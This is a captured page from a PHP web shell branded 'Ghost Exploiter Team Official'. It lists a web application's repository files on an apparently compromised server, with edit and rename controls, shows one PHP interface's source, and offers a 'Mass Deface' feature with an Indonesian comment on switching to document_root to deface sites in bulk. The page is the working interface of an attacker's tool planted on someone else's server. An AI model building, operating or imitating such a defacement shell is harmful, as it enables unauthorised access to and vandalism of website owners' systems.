Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Repositories
/
ProjectGroup
/
Interfaces
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AuthService.php
0.683KB
edt
ren
BaseService.php
0.099KB
edt
ren
Dto.php
0KB
edt
ren
PaymentByArticleReposit
...
0.995KB
edt
ren
PaymentByArticleReposit
...
0.219KB
edt
ren
ResponseDto.php
1.147KB
edt
ren
TokenResponse.php
0KB
edt
ren
accounts.php
0.905KB
edt
ren
cache.php
3.395KB
edt
ren
<?php namespace App\Repositories\ProjectGroup\Interfaces; interface PaymentByArticleRepositoryInterface { public function getProjectIds($modelId, $projectGroupId); public function getArticleIds($projectIds); }